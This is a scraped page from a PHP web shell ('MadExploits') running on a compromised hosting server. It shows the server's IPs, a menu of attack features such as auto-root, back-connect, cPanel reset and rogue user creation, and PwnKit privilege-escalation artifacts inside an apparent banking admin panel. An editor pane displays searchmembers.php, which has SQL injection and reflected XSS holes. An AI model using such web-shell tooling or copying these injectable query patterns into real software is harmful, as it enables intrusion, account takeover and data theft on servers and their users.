Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.115.120 | : 216.73.216.96
Cant Read [ /etc/named.conf ]
5.6.40
midwsfoc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
midwsfoc /
public_html /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
functions
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
add_amount.php
1
KB
-rw-r--r--
add_code.php
3.24
KB
-rw-r--r--
add_user.php
15.1
KB
-rw-r--r--
admin_transactions.php
2.17
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
bulksms2.php
1.98
KB
-rw-r--r--
bulksms20.php
8.42
KB
-rw-r--r--
contact_students.php
1.76
KB
-rw-r--r--
db.php
30
B
-rw-r--r--
del_deposit.php
425
B
-rw-r--r--
delete.php
2.66
KB
-rw-r--r--
delete_banner.php
721
B
-rw-r--r--
delete_beneficiary.php
368
B
-rw-r--r--
delete_code.php
371
B
-rw-r--r--
delete_loan.php
355
B
-rw-r--r--
delete_user.php
991
B
-rw-r--r--
edit_banner.php
3.1
KB
-rw-r--r--
edit_transfer.php
3.18
KB
-rw-r--r--
edit_user.php
18.08
KB
-rw-r--r--
editsettings.php
2.54
KB
-rw-r--r--
error_log
160.39
KB
-rw-r--r--
function_users.php
6.17
KB
-rw-r--r--
functions.php
7.15
KB
-rw-r--r--
home.php
4.07
KB
-rw-r--r--
index -.html
41.78
KB
-rw-r--r--
index.php
56
B
-r--r--r--
insert_banners.php
2.84
KB
-rw-r--r--
login.php
1.57
KB
-rw-r--r--
login_admin.php
3.11
KB
-rw-r--r--
logout.php
164
B
-rw-r--r--
member.php
23.81
KB
-rw-r--r--
picupload.php
2.12
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
register_admin.php
8.45
KB
-rw-r--r--
remove_amount.php
1.01
KB
-rw-r--r--
searchmembers.php
2.94
KB
-rw-r--r--
send_email.php
6.9
KB
-rw-r--r--
testimony.php
3.15
KB
-rw-r--r--
transactions.php
2.66
KB
-rw-r--r--
upload_files.php
2.59
KB
-rw-r--r--
user_error.php
188
B
-rw-r--r--
user_transfer.php
6.3
KB
-rw-r--r--
user_withdrawal.php
4.85
KB
-rw-r--r--
view_admin.php
2.84
KB
-rw-r--r--
view_banners.php
2.23
KB
-rw-r--r--
view_beneficiary.php
3.74
KB
-rw-r--r--
view_cards.php
3.03
KB
-rw-r--r--
view_codes.php
3.07
KB
-rw-r--r--
view_loans.php
2.8
KB
-rw-r--r--
view_referrals.php
1.67
KB
-rw-r--r--
view_users.php
4.37
KB
-rw-r--r--
viewconversation.php
5.25
KB
-rw-r--r--
viewmessage.php
2.4
KB
-rw-r--r--
viewmessages.php
3.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : searchmembers.php
<?php include("includes/header.php"); include("includes/navbar.php"); ?> <?php ?> <?php /* Highlight Words in Search Results with PHP http://www.internoetics.com/2013/11/06/highlight-words-in-search-results-with-php/ */ function highlight($text, $words, $color='yellow', $case='1') { $words = trim($words); $wordsArray = explode(' ', $words); foreach($wordsArray as $word) { if(strlen(trim($word)) != 0) if ($case) { $text = eregi_replace($word, '<font style="background:' . $color . '";>\\0</font>', $text); } else { $text = ereg_replace($word, '<font style="background:' . $color . '";>\\0</font>', $text); } } return $text; } ?> <?php if(isset($_GET['search'])){ $search_id = $_GET['value']; //where the value is not "search" @sidebar form ok!!!! ?> <html><head> <title>Search results for <?php echo $search_id;?></title> </head> <body> <div id="main_content2"> <center><h3> Searching for "<?php echo '<font !style="background:yellow;">' .$search_id."</font>" ?>"</h3></center><hr/> <?php if($search_id==""){ echo "please type in a name to search!!"; } else{ $offset= 0; $page_result= 50; if(isset($_GET['pageno'])){ $page_value = $_GET['pageno']; if($page_value > 1){ $offset= ($page_value - 1) * $page_result; } } $sql="SELECT * FROM users where fullname like '%$search_id%' OR username like '%$search_id%' OR phone_number like '%$search_id%' OR email like '%$search_id%' ORDER BY fullname LIMIT $offset, $page_result "; //$sql="SELECT * FROM posts where post_content like '%$search_id%' "; $run=mysqli_query($con,$sql); $numrows =mysqli_num_rows($run); if($numrows==0){ echo "Search result did not match with any student "; } while($row= mysqli_fetch_array($run)){ $id = $row['id']; $fullname = $row['fullname']; $regno = $row['regno']; $gender = $row['gender']; $photo = $row['photo']; $dept = $row['dept']; $level = $row['level']; $username = $row['username']; //$text ="crystal john is goood crystal"; //$words ="crystal john"; echo '<img src ="'.$link.'images2/small'.$photo.'" width="30" height="30" >'; echo "<strong> ".$fullname."</strong><br/>"; echo '<a href="'.$username.'"/>View user</a><br/>'; echo '<a href="delete_user.php?user='.$username.'"/>DELETE user</a><br/><hr/>'; } } } $sql="SELECT id FROM users where fullname like '%$search_id%' OR username like '%$search_id%' OR phone_number like '%$search_id%' OR email like '%$search_id%' ORDER BY fullname "; $run= mysqli_query($con,$sql); $numrows=mysqli_num_rows($run); $pagecount = $numrows; // Total number of rows $num = $pagecount / $page_result ; if($_GET['pageno'] < $num) { echo "<a href = 'searchmembers.php?value=".$search_id."&search=Search&pageno=".($_GET['pageno'] + 1)." '> view more results </a>"; } ?> </div> </div> </body> <?php include("includes/footer.php");
Close